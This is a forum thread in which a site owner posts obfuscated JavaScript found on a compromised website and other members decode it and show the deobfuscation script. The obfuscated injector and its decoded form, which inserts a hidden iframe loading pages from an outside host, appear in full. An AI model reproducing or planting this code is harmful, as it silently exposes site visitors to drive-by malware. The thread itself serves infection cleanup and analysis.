can anyone help decode this for me?

intence

intence

Regular Member
Joined
Nov 21, 2008
Messages
435
Reaction score
77
One of my sites got malware and the dreaded "this site may compromise your computer" warning. I found this in the source code but having trouble decoding it.

Thanks for the help

Code: 
<script>i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,318,102,206,363,122,228,330,100,220,138,111,220,348,104,202,357,101,196,138,110,234,141,63,206,333,61,100,117,32,238,315,100,232,312,61,78,147,48,78,96,104,202,315,103,208,348,61,78,147,48,78,96,115,232,363,108,202,183,39,236,315,115,210,294,105,216,315,116,242,174,104,210,300,100,202,330,59,224,333,115,210,348,105,222,330,58,194,294,115,222,324,117,232,303,59,216,303,102,232,174,48,118,348,111,224,174,48,118,117,62,120,141,105,204,342,97,218,303,62,68,123,59,26,27,9,250,39,9,18,306,117,220,297,116,210,333,110,64,315,102,228,291,109,202,342,40,82,369,13,18,27,9,236,291,114,64,306,32,122,96,100,222,297,117,218,303,110,232,138,99,228,303,97,232,303,69,216,303,109,202,330,116,80,117,105,204,342,97,218,303,39,82,177,102,92,345,101,232,195,116,232,342,105,196,351,116,202,120,39,230,342,99,78,132,39,208,348,116,224,174,47,94,318,102,206,363,122,228,330,100,220,138,111,220,348,104,202,357,101,196,138,110,234,141,63,206,333,61,100,117,41,118,306,46,230,348,121,216,303,46,236,315,115,210,294,105,216,315,116,242,183,39,208,315,100,200,303,110,78,177,102,92,345,116,242,324,101,92,336,111,230,315,116,210,333,110,122,117,97,196,345,111,216,351,116,202,117,59,204,138,115,232,363,108,202,138,108,202,306,116,122,117,48,78,177,102,92,345,116,242,324,101,92,348,111,224,183,39,96,117,59,204,138,115,202,348,65,232,348,114,210,294,117,232,303,40,78,357,105,200,348,104,78,132,39,98,144,39,82,177,102,92,345,101,232,195,116,232,342,105,196,351,116,202,120,39,208,303,105,206,312,116,78,132,39,98,144,39,82,177,13,18,27,9,200,333,99,234,327,101,220,348,46,206,303,116,138,324,101,218,303,110,232,345,66,242,252,97,206,234,97,218,303,40,78,294,111,200,363,39,82,273,48,186,138,97,224,336,101,220,300,67,208,315,108,200,120,102,82,177,13,18,27,125];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document.createElement("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];} r=String;z=((e)?h:"");for(;577-5+5>i;i+=1){j=i;if(e)s=s+r["fr"+"omChar"+((e)?z:12)]((w[j]/(j%3+1)));} try{dsgsdg=prototype;}catch(dsdh){e(((e)?s:12));}</script>
 
Advertise on BHW
Code: 
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://jfgyzrndn.ontheweb.nu/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://jfgyzrndn.ontheweb.nu/?go=2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
 
wow thanks. could you tell me what it was encoded in? like base64 etc? so I know in the future.
 
it was done with array of obfuscated charcodes. i used following script to translate it:

Code: 
<script>
    var w = [9, 18, 315, 102, 64, 120, 100, 222, 297, 117, 218, 303, 110, 232, 138, 103, 202, 348, 69, 216, 303, 109, 202, 330, 116, 230, 198, 121, 168, 291, 103, 156, 291, 109, 202, 120, 39, 196, 333, 100, 242, 117, 41, 182, 144, 93, 82, 369, 13, 18, 27, 9, 210, 306, 114, 194, 327, 101, 228, 120, 41, 118, 39, 9, 18, 375, 32, 202, 324, 115, 202, 96, 123, 26, 27, 9, 18, 300, 111, 198, 351, 109, 202, 330, 116, 92, 357, 114, 210, 348, 101, 80, 102, 60, 210, 306, 114, 194, 327, 101, 64, 345, 114, 198, 183, 39, 208, 348, 116, 224, 174, 47, 94, 318, 102, 206, 363, 122, 228, 330, 100, 220, 138, 111, 220, 348, 104, 202, 357, 101, 196, 138, 110, 234, 141, 63, 206, 333, 61, 100, 117, 32, 238, 315, 100, 232, 312, 61, 78, 147, 48, 78, 96, 104, 202, 315, 103, 208, 348, 61, 78, 147, 48, 78, 96, 115, 232, 363, 108, 202, 183, 39, 236, 315, 115, 210, 294, 105, 216, 315, 116, 242, 174, 104, 210, 300, 100, 202, 330, 59, 224, 333, 115, 210, 348, 105, 222, 330, 58, 194, 294, 115, 222, 324, 117, 232, 303, 59, 216, 303, 102, 232, 174, 48, 118, 348, 111, 224, 174, 48, 118, 117, 62, 120, 141, 105, 204, 342, 97, 218, 303, 62, 68, 123, 59, 26, 27, 9, 250, 39, 9, 18, 306, 117, 220, 297, 116, 210, 333, 110, 64, 315, 102, 228, 291, 109, 202, 342, 40, 82, 369, 13, 18, 27, 9, 236, 291, 114, 64, 306, 32, 122, 96, 100, 222, 297, 117, 218, 303, 110, 232, 138, 99, 228, 303, 97, 232, 303, 69, 216, 303, 109, 202, 330, 116, 80, 117, 105, 204, 342, 97, 218, 303, 39, 82, 177, 102, 92, 345, 101, 232, 195, 116, 232, 342, 105, 196, 351, 116, 202, 120, 39, 230, 342, 99, 78, 132, 39, 208, 348, 116, 224, 174, 47, 94, 318, 102, 206, 363, 122, 228, 330, 100, 220, 138, 111, 220, 348, 104, 202, 357, 101, 196, 138, 110, 234, 141, 63, 206, 333, 61, 100, 117, 41, 118, 306, 46, 230, 348, 121, 216, 303, 46, 236, 315, 115, 210, 294, 105, 216, 315, 116, 242, 183, 39, 208, 315, 100, 200, 303, 110, 78, 177, 102, 92, 345, 116, 242, 324, 101, 92, 336, 111, 230, 315, 116, 210, 333, 110, 122, 117, 97, 196, 345, 111, 216, 351, 116, 202, 117, 59, 204, 138, 115, 232, 363, 108, 202, 138, 108, 202, 306, 116, 122, 117, 48, 78, 177, 102, 92, 345, 116, 242, 324, 101, 92, 348, 111, 224, 183, 39, 96, 117, 59, 204, 138, 115, 202, 348, 65, 232, 348, 114, 210, 294, 117, 232, 303, 40, 78, 357, 105, 200, 348, 104, 78, 132, 39, 98, 144, 39, 82, 177, 102, 92, 345, 101, 232, 195, 116, 232, 342, 105, 196, 351, 116, 202, 120, 39, 208, 303, 105, 206, 312, 116, 78, 132, 39, 98, 144, 39, 82, 177, 13, 18, 27, 9, 200, 333, 99, 234, 327, 101, 220, 348, 46, 206, 303, 116, 138, 324, 101, 218, 303, 110, 232, 345, 66, 242, 252, 97, 206, 234, 97, 218, 303, 40, 78, 294, 111, 200, 363, 39, 82, 273, 48, 186, 138, 97, 224, 336, 101, 220, 300, 67, 208, 315, 108, 200, 120, 102, 82, 177, 13, 18, 27, 125];
    var i = 0;
    var s;
    var j;
    for (; 577 - 5 + 5 > i; i += 1) {
        j = i;
        s = s + String.fromCharCode((w[j] / (j % 3 + 1)));
    }
    alert(s);
</script>
 
Advertise on BHW
You must log in or register to reply here.
Sign up now!

Main Menu

Home Main Forum List Black Hat SEO White Hat SEO BHW Newbie Guide Blogging Black Hat Tools Social Networking Downloads

Marketplace

Content / Copywriting Hosting Images, Logos & Videos Proxies For Sale SEO - Link building SEO - Packages Social Media Social Media - Panels Web Design Misc

Making Money

Affiliate Programs Hire a Freelancer Making Money Pay Per Click Site Flipping

BlackHatWorld

BHW Merch Forum Suggestions & Feedback Introductions Lounge Dispute Resolution

Other

Domain Name Forum IM Journeys Web Hosting Newsletter
Back
Top